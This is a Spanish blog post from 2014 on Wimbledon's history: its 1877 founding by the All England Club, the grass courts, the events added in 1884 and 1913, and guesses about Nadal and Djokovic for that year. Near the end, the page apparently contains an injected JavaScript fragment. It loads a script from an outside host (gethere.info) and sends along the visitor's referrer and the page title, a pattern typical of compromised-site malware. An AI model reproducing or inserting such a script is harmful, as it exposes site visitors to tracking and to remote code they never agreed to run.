Famoso Wimbledon

25/06/2014

Rafa Nadal, Wimbledon semi-final 2011

¿Quién no ha oído hablar alguna vez de Wimbledon? ¿El torneo de tenis más antiguo y prestigioso del mundo? ¿Y sabéis algo sobre su historia? ¿En qué año se celebró por primera vez? ¿Fue siempre un torneo mixto?

Para los que no conozcan las respuestas a estas preguntas, y algunas otras más… ¡Allá vamos!

1877 fue el primer año en que se celebró este torneo. Organizado por el club privado All England Lawn Tennis and Croquet Club, con sede en Wimbledon, era lógico que allí mismo se organizase el evento deportivo. La idea era buena, triunfó y en la actualidad, el certamen inglés es uno de los Grand Slam que cada año se juegan. Lo precede el Abierto de Australia y Roland Garros y lo sigue el Abierto de Estados Unidos. Y si algo le diferencia claramente de los otros torneos de su misma categoría es el hecho de que se lleve a cabo sobre césped.

Suele durar dos semanas, que suelen coincidir con las últimas de junio y las primeras de julio. Wimbledon 2014 empezó hace dos días, el 23 de junio, y va hasta el 6 de julio -estas fechas siempre están sujetas a cambios, provocados por las imprevisibles y constantes lluvias inglesas-.

Aunque comenzó siendo un certamen masculino individual -en 1877 participaron 22 jugadores, cifra que ha ido creciendo con el paso de los años- ya en 1884 se agregó la modalidad femenina individual así como los dobles masculinos. Y en 1913 se completó con el resto de modalidades, teniendo ya, las mismas que se tienen en la actualidad: los dobles femeninos y los dobles mixtos.

En 2013 triunfaron el escocés Andy Murray y la francesa Marion Bartoli ¿Tendremos suerte española este año? ¿Veremos por ejemplo a nuestro gran Nadal disputar la final sobre la Pista Centre Court, el lugar dónde tienen lugar la grandes finales? Las estadísticas no favorecen a Rafa, por sus últimos resultados en hierba. Por el contrario favorecen al serbio Djokovic… ¿Será verdad?

Dentro de nada lo sabremos, es cuestión de tiempo 🙂

¡Señores, hagan sus apuestas!

Foto | Steve M. Walker

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO